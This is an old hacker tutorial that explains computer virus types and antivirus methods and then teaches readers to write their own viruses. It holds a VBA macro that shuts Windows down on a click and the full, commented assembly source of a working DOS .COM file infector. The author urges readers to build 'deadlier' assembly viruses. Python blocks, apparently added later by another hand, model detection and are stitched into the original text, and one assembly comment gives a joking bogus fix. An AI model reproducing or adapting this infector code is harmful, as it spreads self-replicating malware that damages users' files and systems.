Virus/Trojan Journal------How Does a Virus work and how do I make my own Virus?

By Vinay Jagatap.k vinukj@mailcity.com
_____________________________________________________________________________

After I wrote the journals on Happy99 and Melissa, I got many emails asking me about the working of a virus: how it actually infects a computer, and how one can make one's own virus.

Well, this journal aims to make clear how a virus infects something and how exactly it works. I will also give an introduction to making your own virus.

Virus: What exactly is a Virus

A virus is basically a program, usually a small piece of code attached to an executable file or a document, designed so that, first of all, it can infect other files; then it can survive by replicating itself; and then it can avoid detection. To avoid detection, a virus usually disguises itself as, or hides inside, a legitimate program which the user would not normally suspect. Many viruses also carry a destructive payload, for example corrupting or deleting data on the hard disk by damaging the FAT (File Allocation Table). Viruses can be classified mainly into the following categories:

Boot Sector Viruses (MBR or Master Boot Record)

Boot sector viruses can be created without much difficulty and infect either the master boot record of a hard disk or the boot sector of a floppy disk. The boot record program responsible for booting the operating system is replaced by the virus; the virus either copies the original boot program to another part of the disk or simply overwrites it. They infect the computer when it boots from an infected disk, most often because an infected floppy was left in the drive at startup; once resident, the virus infects every floppy that is subsequently accessed in the drive.

Popular boot viruses include Michelangelo and Stoned.

*********************

NewBie Tip: Don't know what an MBR or Master Boot Record is? First understand what a boot record is. The boot record is the first sector of a floppy disk (or of a partition on a hard disk). It contains a small program that loads the operating system when the machine boots, plus information like the disk geometry and the sector and cluster size.

The MBR is the first sector of a hard disk. It contains the boot loader program that the BIOS runs first, and the partition table, which records where each partition (with its own boot record) starts. If the MBR is corrupted the OS will not be launched.

*******************

File or Program Viruses

Some programs are viruses in disguise: when executed they load the virus into memory along with the program, perform the predefined steps and infect the system. They infect program files, that is, files with extensions like .EXE, .COM, .BIN, .DRV and .SYS. Some file viruses just replicate while others destroy the program being used at the time. Such viruses start replicating as soon as they are loaded into memory. As file viruses may also damage the program currently being used, after removing the virus or disinfecting the system the program that got corrupted has to be repaired or reinstalled too.

Some popular file viruses are Sunday and Cascade.

Multipartite Viruses

Multipartite viruses are the hybrid variety; they can best be described as a cross between boot viruses and file viruses. They infect not only files but also the boot sector, and they are more destructive and more difficult to remove. First they infect program files, and when an infected program is launched the multipartite virus starts infecting the boot sector too.

The interesting thing about these viruses is that they do not stop once the boot sector is infected. After the boot sector is infected, every time the system boots they load into memory and start infecting other program files.

Some popular examples would be Invader and Flip etc.

Stealth Viruses

These viruses are stealthy in nature and use various methods to hide themselves and avoid detection. Some temporarily remove themselves from memory to hide from virus scanners. Some intercept disk reads and redirect them to another sector instead of the sector in which they reside, so that a scanner reads clean data. Some stealth viruses, like Whale, conceal the increase in length of an infected file and display the original length by subtracting from the reported size exactly the amount they added. For example, the Whale virus adds 9216 bytes to an infected file and, while it is resident, subtracts the same 9216 bytes from the size reported in the directory listing.

They are somewhat difficult to detect.

Polymorphic Viruses

They are the most difficult viruses to detect. They have the ability to mutate, meaning that they change their viral code, and therefore their signature, each time they spread or infect: the virus body is encrypted with a different key in every copy and preceded by a different decryption routine, so no two copies share the same byte sequence. Thus anti-viruses which look for specific virus code are not able to detect such viruses.

Now what exactly is a viral signature? The signature can be defined as the specific fingerprint of a particular virus: a string of bytes taken from the code of the virus. Anti-virus software maintains a database of known virus signatures and looks for a match each time it scans for viruses. As we see a new virus almost every day, this database of virus signatures has to be kept updated. This is the reason why anti-virus vendors provide updates.

Macro Viruses


First, to understand macro viruses you need to understand a macro. You have probably used Microsoft Excel or Word; in Office 97 there is a feature known as macros, which allows a task the user performs often to be recorded once and repeated again and again by just clicking a play button. Macros are sets of automated instructions or tasks which make work more efficient and fast for the user. Beneath Office 97 there is a Visual Basic engine, so we can say that the core of Microsoft's Office suite is a Visual Basic engine which runs behind the scenes and can be used for advanced Visual Basic coding.

So a macro virus is a virus which consists of evil or viral macro code, written in VBA (Visual Basic for Applications), that creates havoc on the computer it is executed on. These viruses spread quickly and some have random activation, since the code can be attached to many of VBA's event handlers. Macro viruses are not platform specific: a Word macro virus can infect both Windows and Mac systems, because it runs inside Word rather than directly on the operating system. But for a macro virus to infect a system, the document with the embedded evil macro has to be opened and its macros allowed to run.

Now that I have given you a general introduction to the different types of viruses, let's move on to how they work and how exactly they infect systems. Above we said that stealth viruses and polymorphic viruses are difficult to detect; the question is why. Consider what most anti-virus software does to detect and catch a virus.

One technique is checksumming (integrity checking). An executable file does not change the way a data file does; it only changes when you upgrade the program. So the checksummer in the anti-virus software records, for every executable, a checksum of its contents (and usually its size), and on each later scan recomputes the checksum and compares it with the recorded value; any difference means the file has been modified. A stealth virus beats this while it is resident in memory: it hooks the DOS file services and reports the original size, and in some cases the original contents, whenever the file is read, so the checksummer never sees the change. (It would see it if the disk were scanned after booting from a clean, write-protected floppy, which is why a clean boot is the first step in cleaning such an infection.)

The other technique is signature scanning, which compares the bytes of executable files against a database of all viral signatures known so far. Polymorphic viruses mutate: each copy is re-encrypted with a different key and a different decryptor, so the known signature never appears in the file and a purely signature-based scanner cannot detect the new copies, just as it cannot detect any virus for which it has no signature yet. Thus polymorphic viruses escape signature-based anti-viruses and stealth viruses escape checksumming, which is why anti-viruses nowadays also use a method known as heuristics.

In comes the heuristic scanner, which does not rely only on signatures but uses a smarter way to scan for viruses: it scans the drive for typical viral code and behaviour (for example a decryption loop at the program's entry point, or code that opens other executables for writing). Such scanners have a downside too: they sometimes give false alarms and declare an uninfected file to be a virus.
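The following is an added example in Python (my own illustration, not code from the original page) that models the three approaches just described side by side: a signature scanner, a checksummer that records size and a SHA-256 digest, and a heuristic scanner that recognises a decryptor and runs it before scanning. The "virus body", the hosts and the XOR-based "decryptor" are constructed byte strings chosen for the demonstration; the marker string XORSTUB: stands in for a real decryption loop. It shows why a polymorphic copy slips past the signature scanner but not past the checksummer or the emulating heuristic, and why a size-only check is weaker than a content hash.

```python
import hashlib
from typing import Dict, Tuple

# Constructed sample "virus body"; not taken from any real virus.
PAYLOAD = bytes.fromhex("b44e33c9cd21b43dcd21b440cd21")
# A signature is a string of bytes taken from the virus code.
SIGNATURE = bytes.fromhex("b44e33c9cd21")
# Constructed marker standing in for a per-copy decryption routine.
STUB_MARK = b"XORSTUB:"


def signature_scan(data: bytes, sig: bytes = SIGNATURE) -> bool:
    """Signature scanning: report a match if the known byte string occurs."""
    return sig in data


def polymorphic_copy(payload: bytes, key: int) -> bytes:
    """Model one polymorphic generation: the body is XOR-encrypted with a
    fresh key and preceded by a decryptor that differs per copy (here the
    marker plus the key byte).  The plaintext body, and so its signature,
    never appears in the copy."""
    if not 1 <= key <= 255:
        raise ValueError("key must be a non-zero byte")
    return STUB_MARK + bytes([key]) + bytes(b ^ key for b in payload)


def emulate_decryptor(data: bytes) -> bytes:
    """What an emulating (heuristic) scanner does: find the decryptor, run
    it (undo the XOR) and return the decrypted body for signature scanning."""
    i = data.find(STUB_MARK)
    if i < 0:
        return data
    key = data[i + len(STUB_MARK)]
    return bytes(b ^ key for b in data[i + len(STUB_MARK) + 1:])


def heuristic_scan(data: bytes) -> bool:
    """Flag a recognisable decryptor, or a signature in the decrypted body."""
    return STUB_MARK in data or signature_scan(emulate_decryptor(data))


def baseline(files: Dict[str, bytes]) -> Dict[str, Tuple[int, str]]:
    """Checksummer step 1: record size and SHA-256 of every executable."""
    return {n: (len(d), hashlib.sha256(d).hexdigest()) for n, d in files.items()}


def integrity_check(files: Dict[str, bytes],
                    base: Dict[str, Tuple[int, str]]) -> Dict[str, str]:
    """Checksummer step 2: recompute and compare; return what changed and how.
    A size-only check would miss the second case entirely."""
    changed = {}
    for name, data in files.items():
        size, digest = base[name]
        if len(data) != size:
            changed[name] = "size changed"
        elif hashlib.sha256(data).hexdigest() != digest:
            changed[name] = "content changed, size unchanged"
    return changed


# Constructed host programs (a few bytes each stand in for whole .COM files).
HOSTS = {
    "HOST1.COM": b"\xb8\x00\x4c\xcd\x21" + b"\x90" * 27,
    "HOST2.COM": b"\xb4\x09\xcd\x21" + b"\x90" * 28,
}


def infect_models(hosts: Dict[str, bytes]) -> Dict[str, bytes]:
    """Two ways a file can be changed: HOST1 gets a polymorphic copy appended
    (its size grows); HOST2 is overwritten in place (its size stays equal)."""
    out = dict(hosts)
    out["HOST1.COM"] = hosts["HOST1.COM"] + polymorphic_copy(PAYLOAD, 0x5A)
    body = polymorphic_copy(PAYLOAD, 0xA3)
    out["HOST2.COM"] = body + hosts["HOST2.COM"][len(body):]
    return out


if __name__ == "__main__":
    base = baseline(HOSTS)
    infected = infect_models(HOSTS)
    for name, data in infected.items():
        print(name, "signature:", signature_scan(data),
              "heuristic:", heuristic_scan(data))
    print("integrity:", integrity_check(infected, base))
```

Running it shows the signature scanner reporting both infected hosts as clean, the heuristic scanner catching them after emulating the decryptor, and the integrity check flagging both, the in-place overwrite only because a content hash rather than the file size was compared.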

How does a PolyMorphic Virus Strike?

  1. The user copies an infected file to the disk.
  2. When the infected file is run, it loads the virus into memory (RAM).
  3. The resident virus looks for hosts and starts infecting other files on the disk.
  4. Each infection writes a copy of the virus into the host file.
  5. For each copy, the mutation engine generates a new decryption routine and encrypts the virus body with a new key, so that no two copies share the same byte sequence.

Thus it avoids detection by signature scanners. (A checksummer, which only looks for changed files, would still notice that the host was modified.)

How does a Boot Virus Strike?

  1. The user boots from an infected floppy disk (typically one left in the drive at startup), or runs a "dropper" program that carries the virus.
  2. The boot code of the infected floppy (or the dropper) loads the virus into memory.
  3. The virus copies the original boot record to another sector and keeps a pointer to it, so that it can pass control on to it after running.
  4. The virus then writes a copy of itself into the boot sector of the disk (on a hard disk, the MBR).
  5. The next time the computer boots from that disk the virus loads itself into memory before the operating system and starts infecting the boot sectors of other floppies it sees (and, for multipartite viruses, program files too).

How does a Macro Virus strike?

  1. The user receives an infected Office document by email or any other medium.
  2. The user opens the document and lets its macros run.
  3. The evil macro code is attached to an event handler (for example opening or closing a document); when that event occurs the virus is set off and starts infecting other documents, usually beginning with the global template so that every document opened afterwards is infected as well.

 

Windows 95 does not include an anti-virus program. However, it includes several features that make it difficult for viruses to infect your computer. (This section also gives valuable info on how a virus works and can be used to figure out how to write one.) It does this by using the following features:

Blocking Direct Disk Access

Some viruses and other programs attempt to bypass the operating system and the system ROM BIOS and use INT 25h or INT 26h (absolute disk read and write) to write to the hard disk directly. When a program attempts to access the hard disk in this manner, Windows prevents the program from doing so and displays the error message 'Windows has disabled direct disk access to protect your long filenames. To override this protection, see the LOCK /? command for more information. The system has been halted. Press CTRL+ALT+DELETE to restart your computer.'

This feature prevents many viruses from infecting your computer and damaging the data on your hard disk.

Recognising Master Boot Record (MBR) Modifications

Most boot viruses infect computers by modifying the MBR and hooking the INT 13h chain. Windows prevents this type of virus from damaging your data by maintaining a list of the programs that are currently hooking the INT 13h chain. Each time you start your computer, Windows 95 checks to see which programs are monitoring the INT 13h chain, and then compares this list of programs with the list that it recorded the last time Windows 95 started. If any new programs that Windows 95 does not recognise have hooked the INT 13h chain, it displays the message 'WARNING: Your computer may have a virus. The Master Boot Record on your computer has been modified. Would you like to see more information?' If you click Yes, the Performance tab in System Properties is displayed, which provides more information and allows you to begin troubleshooting the problem.

When a virus modifies the MBR, the Performance tab in System Properties and the Ios.log file generally report that a file called Mbrint13.sys is causing drives to be accessed in MS-DOS Compatibility mode.

Identifying Unknown Device Drivers

Windows 95 maintains a list of all the real-mode device drivers that it can safely replace with its own protected-mode drivers. If you add a new device driver that hooks the INT 13h or INT 21h chain and the driver is not on the list of drivers that can safely be replaced, Windows 95 is forced to access drives using MS-DOS Compatibility mode instead of protected mode.

When this occurs, Windows displays the message 'A new MS-DOS resident program named <filename> may decrease your system performance. Would you like to see more information about this problem?', where <filename> is the name of the new device driver. This allows Windows 95 to identify those viruses that propagate from a device driver instead of modifying the MBR.

Although Windows manages the computer and safeguards your data, you should always use a third-party anti-virus package that is specifically designed for the purpose, and update it regularly for better protection. Microsoft Plus! 98 for Windows 98 includes McAfee anti-virus software as an option.

How Do I make my own Virus?

SomeBody once said:

"The average Virus writer is above 14 years and below the age of 23 and the virus writers of some evil viruses suffer from social loneliness."

Well, I agree with the age part but not the social part. Most virus creators do not create viruses with the intent of creating havoc or destroying computers. They create a virus just out of interest and send it to their friends, and, like most email-borne viruses of today, it spreads like anything, and before the virus creator knows it the feds have started a manhunt for him.

Macro Viruses

Macro viruses are basically VBA code written in the Visual Basic Editor that ships with Office 97 or Office 2000.

*************

NewBie Tip: To launch the Visual Basic Editor simply press ALT + F11.

************

So in order to write macro viruses you just need to know VB. I am only touching on some VB here, and this guide will in no way make you a VB geek. I am not writing a manual on writing macro viruses, as I believe that macro viruses are lame; I personally hate VB and think that assembly viruses are much better and deadlier. If you really want to be good at VB then you should know the entire MSDN library like the back of your hand. Access the ultimate source of VB at http://msdn.microsoft.com

Macro viruses can have random or multiple activation events. Let's take an example to make it clearer:

Private Sub UserForm_Initialize()
    CommandButton1.Accelerator = "C"    'Set accelerator key to ALT + C
End Sub

Private Sub CommandButton1_Click()
    Dim intShell
    'Call USER's ExitWindowsExec through Rundll: Windows shuts down
    intShell = Shell("c:\windows\Rundll.exe user,ExitWindowsExec")
End Sub

The above snippet of code is supposed to trigger when the user clicks the command button. So as soon as the user clicks the button, the event procedure runs, a variable named intShell is declared and assigned the result of the Shell call, and the victim's computer shuts down without warning.

In the line Private Sub CommandButton1_Click(), CommandButton1 is the object and _Click is the event. The event can also be changed to something else like DblClick, KeyPress, KeyDown, KeyUp, Exit or Enter, so that the macro (the virus) is triggered when the user double-clicks, presses a key, releases a key, or when the control loses or receives the focus.

So if you really want to write a macro virus, first you need to learn VB. A good place to start would be the online MSDN Library, or get yourself a good book. If you already know a bit of the language 'Basic' and have done either JavaScript or Java, i.e. you know what is meant by event handlers, then I am sure you can learn VBA by just reading the Help and the articles at MSDN.

I personally do not like VB, and I think that if you are still to start learning VB then you had better learn some other language; I do not think learning VB is worth the trouble just to make a virus. If your sole aim is to make a deadly virus and create havoc, then do not even consider making a macro virus, i.e. learning VB. You should rather look at learning assembly.

There are various reasons why macro viruses are not as deadly as viruses made in assembly. You may have heard about evil Java applets which, when downloaded, can create havoc on your PC, and you have certainly heard about the Melissa virus (read my tutorial on Melissa for source code and more info). Well, both of them are slow viruses; by that I mean they give the user time to react and maybe stop the infection, and they are not efficient. Assembly viruses, on the other hand, do not give the victim time to even realise what is happening; before he knows it, he is infected!!!

Using Assembly to Create Your own Virus!!!!

I recently got many emails asking me how one could create viruses and which languages one needs to know before creating an excellent, dreaded virus. Well, the simple answer to all these questions is: learn assembly. It allows us to make really deadly viruses which do not give the victim time to react and infect his system even before he knows what is happening.

The best way to learn assembly would be to read "The Art of Assembly". It is an excellent book which assumes that you have very little programming experience. It is easy to understand and quite impressive.

Read The Art of Assembly online and become an ASM wiz at:

The Art of Assembly Language Programming

http://webster.cs.ucr.edu/Page_asm/ArtofAssembly/ArtofAsm.html

Online resource:

http://www.programmersheaven.com/zone5/index.htm

You should also get a book solely about the x86 architecture; get it online from

http://developer.intel.com/design/litcentr/index.htm

 

****************

TIP: Assembly not only allows you to make viruses; along with it comes an added advantage: the power to crack software. Keep reading my Cracking Series to learn how you can crack programs.

****************

Let's move on to the real stuff. In this section I am assuming that you have at least some experience in assembly. The following piece of text has been written by me with some help from Drako.

The survival of a virus is based on its ability to reproduce. "So how the fuck do I make a program reproduce?", you might ask. Simple, by getting it to copy itself to other files....

The functional logic of a virus is as follows:

1- Search for a file to infect

2- Open the file to see if it is infected

3- If infected, search for another file

4- Else, infect the file

5- Return control to the host program.

The following is an example of a simple virus:

;****************************************************************
; START OF THE EXAMPLE:
;****************************************************************
;Warning, this example is a (piece of shit?)
; - The virus does not test for prior infection
; - it searches only for the first .COM file in the current
;   directory
;
; Careful when executing this file, since the first time it's
; executed it will search for and infect the first file in the
; directory. If we later run the newly infected file, it will find
; the first file in its directory, itself. Thus, it will re-infect
; itself over and over.
;===================CODIGO=======================================
;(The variables in a .COM file are relative to offset 100h).

codigo segment 'code'
org 100h                        ;Organize all the code starting
                                ; from offset 100h
assume cs:codigo,ds:codigo,es:codigo ;Define the use of the segments

start proc far                  ;Start the routine
COMIENZO:
push cs                         ;Store CS
push cs                         ;Store CS once again.
pop ds                          ;Bring DS out from stack
pop es                          ;Bring ES out from stack
call falso_proc                 ;Call proc. so that its
                                ; address is placed on the stack
falso_proc proc near
falso_proc endp
pop bp                          ;BP<== return address (107h in the
                                ; first generation)
sub bp, 107h                    ;BP<== BP - 107h = displacement of
                                ; this copy

;This is done to address the variables relative to BP, since the
; infection displaces the variables by exactly the length of the
; host file. In the first generation the value popped is 107h, so
; "SUB BP, 107h" leaves BP = 0 and "BP+VARIABLE" is the variable's
; original address. When the virus runs from a 100h byte infected
; file, the value popped is 207h and "SUB BP, 107h" leaves
; BP = 100h, the size of the original file. Had I used the variable
; without adding BP, I would have been short by 100h bytes.

;Find the first .COM file in the directory
;-----------------------------------------
mov ah, 4eh                     ;Search for the 1st file (find first)
lea dx, [bp+file_inf]           ;DS:DX= offset of FILE_INF, the mask
                                ; '*.COM' ('*.*' would match every
                                ; file, directory entries included)
mov cx, 0000h                   ;Entry attributes
int 21h

;These attributes are the directory entry attributes. When I set
; the attributes to 0, I'm telling DOS to search normal files. If I
; include a bit combination which provides the Hidden, System or
; Directory attributes, DOS will search for files with those
; attributes as well as the normal files. If the search range
; includes the Volume bit, the search is limited to that.
;These are the bits which correspond to each attribute:
;Bits: 7 6 5 4 3 2 1 0
;      . . . . . . . 1   Bit 0: Read only
;      . . . . . . 1 .   Bit 1: Hidden
;      . . . . . 1 . .   Bit 2: System
;      . . . . 1 . . .   Bit 3: Volume label
;      . . . 1 . . . .   Bit 4: Directory
;      . . 1 . . . . .   Bit 5: Archive
;
;Bits 6 and 7 are not used as they are reserved for "future
; applications".

;Open file
;----------------------------------------------------------------
mov ah, 3dh                     ;Open the file.
mov al, 00000010b               ;read/write.
mov dx, 009eh                   ;DX<== offset of the filename in the
                                ; DTA (80h+1Eh)
int 21h                         ;the handle comes back in AX
push ax                         ;and is stored on the stack.

;The value I'm setting in AL is not an attribute like before. It
; is the "open" access mode. We are only interested in the first
; 3 bits,
;bits 2 1 0:
;
;     0 0 0   Read only mode
;     0 0 1   Write only mode
;     0 1 0   Read/Write mode
;
;OK, we now have the access mode in AL. What we now need to do is
; to store in DX the offset of the variable where I've stored the
; ASCIIZ string with the name of the file to be opened. In this
; case, we don't have a NAME_OF_FILE variable. Instead, the name is
; located in the DTA (Disk Transfer Area). Why do we have it in the
; DTA? Simply because when we search for a file to infect, all the
; information we need is returned to this memory area. This buffer,
; if it was not moved, is found in the PSP; more precisely, it
; starts at offset 80h and is 43d bytes in size.
;
;The DTA format is as follows:
;
;Offset  Bytes  Function
;  00h    21d   Used by DOS for the 4fh service
;               (search for the next file)
;  15h    01d   Attributes of the file that's been found
;  16h    02d   File time
;  18h    02d   File date
;  1Ah    04d   File size in bytes
;  1Eh    13d   File name as an ASCIIZ string
;               (FILENAME.EXT),0
;
;Well, all that remains to be done is to give DX the position in
; memory where the filename is stored: "MOV DX, 1Eh" and it's done.
; But careful now, remember that the DTA starts at offset 80h,
; which means I have to pass to DX the value "80h+1Eh = 9Eh". That
; leaves "MOV DX, 9Eh"; the problem is solved. Now you are probably
; asking yourselves what I mean by "handle". The handle is a number
; which tells DOS which file we want. DOS gives us a handle for
; each file we open, so we have to be careful to use the correct
; handle for each file which we read/write.

;Read the first 3 bytes.
;-----------------------------------------------------
pop bx                          ;I take the handle from the
                                ; stack to BX
push bx                         ;and I store it again.
mov ah, 3fh                     ;Read file.
mov cx, 0003h                   ;Read 3 bytes.
lea dx, [bp+buffer]             ;and store them in the buffer.
int 21h

INFECTAR:                       ;(infect)
;Move pointer to the start.
;---------------------------------------------------
mov ax, 4200h                   ;Move the file pointer (AL=00:
                                ; relative to the beginning)
mov cx, 0000h                   ;CX:DX = displacement 0
mov dx, 0000h
int 21h

;The pointer's displacement, relative to the position specified in
; AL, is placed in CX:DX.
; Pointer displacement modes set in AL:
; AL <== 00  Move pointer relative to the beginning of the file.
; AL <== 01  Move pointer relative to its current position.
; AL <== 02  Move pointer relative to end-of-file.

;Write the first byte (jmp)
;-------------------------------------------------
mov ah, 40h                     ;write the first byte.
mov cx, 1d                      ;Quantity=1.
lea dx, [bp+jump]               ;DX<== JUMP offset (the E9h opcode)
int 21h

;(Here we still need the handle, but we don't need to set it again
; because BX, the register which contained it, was not modified.)
;
;The first byte to be written is a JMP opcode (E9h, defined in the
; data area below). What follows the JMP is its 16-bit displacement:
; the original file length minus 3, since a JMP rel16 is relative
; to the byte after its own 3 bytes. (Test this thoroughly, since an
; off-by-one here lands in the middle of an instruction; if so,
; multiply by 18 or subtract 23. Hehehehe.)
;Since the entire virus code is copied at the end of the file, the
; jump gives the virus control in an infected file.

;Calculating file length
;-------------------------------------------------
mov cx, 2                       ;Copy 2 bytes.
mov si, 009ah                   ;SI<== offset of the size in the
                                ; DTA (80h+1Ah)
lea di, [bp+longitud]           ;DI<== File LENGTH offset.
rep movsb                       ;Copy.

;This instruction must have the 'SOURCE' address in DS:SI and the
; address where the bytes will be copied in ES:DI (in this case, I
; copy the low word of the file size from the DTA to the variable
; 'LONGITUD'; a .COM file never exceeds 64 KB, so the high word is 0).

sub word ptr [bp+longitud], 3   ;subtract 3 bytes from [LONGITUD]

;The JMP is completed
;--------------------------------------
mov ah, 40h                     ;Write.
mov cx, 2d                      ;Number of bytes.
lea dx, [bp+longitud]           ;DX<== LONGITUD (length) offset
int 21h

;Move pointer to end
;-------------------------------------------------------
mov ax, 4202h                   ;Move the file pointer to the
                                ; end of the file (AL=02).
mov cx, 0000h
mov dx, 0000h
int 21h
add word ptr [bp+longitud],3    ;Restore LONGITUD.

;Copy the virus to the program.
;---------------------------------------------------
pop bx                          ;Restore the handle.
mov ah, 40h
mov cx, 190d                    ;number of bytes to copy: the
                                ; assembled length of the virus,
                                ; from COMIENZO to the end of the
                                ; data area. Recheck it if you
                                ; change the code.
lea dx, [bp+comienzo]           ;Start copying from....
int 21h

;Close the file after infection
;------------------------------------
mov ah, 3eh                     ;Close file.
int 21h

;Close needs only the handle in BX, which is still there from the
; write above.

NO_INFECTAR:
;==================RETURN CONTROL TO THE HOST=====================
;Copy the buffer which contains the first 3 bytes of the file into
; memory.
;------------------
mov cx, 0003h                   ;Number of bytes (3).
mov di, 0100h                   ;DI<== offset 100h. Beginning of the
                                ; program in memory.
lea si, [bp+buffer]             ;SI<== BUFFER offset
rep movsb                       ;Copy.

;What we are doing here is to "fix" the host in memory, since when
; it was infected its first 3 bytes were overwritten by the JMP.
; That is why we reconstruct the program to its original state, by
; copying the 3 bytes we read earlier back to offset 100h.

;Jump to offset 100h
;--------------------------------------------------------
mov ax, 0100h                   ;Address needed to execute the host
jmp ax

;As we mentioned before, in .COM files the executable code begins
; at offset 100h. The 100h bytes from 00h to 100h are the PSP, which
; holds program data like the DTA for example.
;The main difference between a .COM file and an .EXE is that a .COM
; cannot occupy more than one memory segment, 64 KB. .EXEs can,
; because DOS relocates them to fit into a number of different
; segments. Unlike .EXE files, .COM files are faithful reproductions
; of the contents of memory.

;====================DATA AREA===================================
buffer db 7d dup(0)
longitud db 2 dup(0)
file_inf db '*.COM',0
jump db 0E9h,0                  ;<---- JMP rel16 opcode. (The original
                                ; wrote 'é' here, which assembles to
                                ; E9h only in a Latin-1 source file;
                                ; in a CP437 DOS editor 'é' is 82h.)
;(The 0 is the end of the ASCIIZ string)
start endp                      ;End of main procedure
codigo ends                     ;end of code segment
end comienzo                    ;END. Entry point is COMIENZO
;****************************************************************
; END OF EXAMPLE
;****************************************************************
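Two pieces of the example above are easy to get wrong and worth checking by hand: the layout of the DTA record that the find-first call fills in (the offsets 9Ah and 9Eh the code reads), and the displacement written after the E9h opcode. The following Python is an added example (my own, not the author's or Drako's code) that parses a DTA record from its documented layout, confirms the PSP offsets, computes the 3-byte jump for a given host length, and reads a .COM image back to decide whether its entry jump lands exactly 190 bytes before end of file, the tell-tale shape of this particular appender. The DTA record, the host bytes and the 190-byte "appended code" (just 0CCh filler) are constructed for the demonstration.

```python
import struct
from datetime import datetime
from typing import Optional

# DTA record as filled in by INT 21h/4Eh, per the table in the example:
# 21 reserved bytes, attribute byte, time word, date word, size dword,
# 13-byte ASCIIZ name.  Little-endian, no padding.
DTA_FMT = "<21sBHHI13s"
DTA_SIZE = struct.calcsize(DTA_FMT)   # 43 bytes, as the comments state
PSP_DTA = 0x80                        # default DTA lives at PSP offset 80h
VIRUS_LEN = 190                       # bytes the example appends (mov cx,190d)


def dos_datetime(date_word: int, time_word: int) -> datetime:
    """Decode the packed DOS date (YYYYYYYMMMMDDDDD) and time (HHHHHMMMMMMSSSSS)."""
    return datetime(1980 + (date_word >> 9), (date_word >> 5) & 0x0F,
                    date_word & 0x1F, time_word >> 11,
                    (time_word >> 5) & 0x3F, (time_word & 0x1F) * 2)


def parse_dta(buf: bytes) -> dict:
    """Pull the find-first result fields out of a raw DTA buffer."""
    _, attr, t, d, size, name = struct.unpack(DTA_FMT, buf[:DTA_SIZE])
    return {"attr": attr, "size": size,
            "name": name.split(b"\0", 1)[0].decode("ascii"),
            "mtime": dos_datetime(d, t)}


def psp_offsets() -> dict:
    """Where the size and name sit when the DTA is at PSP:80h
    (the 9Ah and 9Eh hard-coded in the example)."""
    return {"size": PSP_DTA + 0x1A, "name": PSP_DTA + 0x1E}


def make_dta(name: str, size: int, attr: int = 0x20,
             date_word: int = 0, time_word: int = 0) -> bytes:
    """Constructed DTA record standing in for what DOS would return."""
    return struct.pack(DTA_FMT, b"\0" * 21, attr, time_word, date_word,
                       size, name.encode("ascii").ljust(13, b"\0"))


def infection_jmp(host_len: int) -> bytes:
    """The 3 bytes the example writes over the host's start: E9h plus a
    16-bit displacement.  JMP rel16 adds the displacement to the address
    of the next instruction (100h+3) and the appended code starts at
    100h+host_len, so the displacement is host_len-3."""
    return b"\xe9" + struct.pack("<H", (host_len - 3) & 0xFFFF)


def entry_file_offset(data: bytes) -> Optional[int]:
    """If the .COM image starts with JMP rel16, the file offset it lands on
    (file offset 0 is memory offset 100h, so the 100h cancels out)."""
    if len(data) >= 3 and data[0] == 0xE9:
        rel = struct.unpack("<h", data[1:3])[0]
        return (3 + rel) & 0xFFFF
    return None


def looks_infected(data: bytes, virus_len: int = VIRUS_LEN) -> bool:
    """Detection heuristic for this specific appender: the entry jump lands
    exactly virus_len bytes before end of file."""
    entry = entry_file_offset(data)
    return entry is not None and entry == len(data) - virus_len


def model_infected_image(host: bytes, appended: bytes) -> bytes:
    """Constructed test image laid out the way the example leaves a file:
    3-byte jump patched in, rest of the host untouched, code at the end."""
    return infection_jmp(len(host)) + host[3:] + appended


if __name__ == "__main__":
    rec = make_dta("HOST.COM", 0x100, date_word=9999, time_word=25541)
    print(parse_dta(rec), psp_offsets())
    host = b"\xb8\x00\x4c\xcd\x21" + b"\x90" * 0xFB      # 256-byte host
    img = model_infected_image(host, b"\xcc" * VIRUS_LEN)
    print(infection_jmp(len(host)).hex(), entry_file_offset(img),
          looks_infected(img), looks_infected(host))
```

For a 100h-byte host the patch is E9 FD 00, and the entry offset decodes back to 100h, i.e. the first byte of the appended code. A fixed-length appender that does not mark its infections is exactly this easy to fingerprint, which is one reason real scanners of the period checked entry-point jumps against the file length.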

Well, after reading this guide you may be in a position to make simple viruses. I will soon be updating this guide with info on making deadlier viruses. Till then, bye.

Vinay Jagtap

vinukj@mailcity.com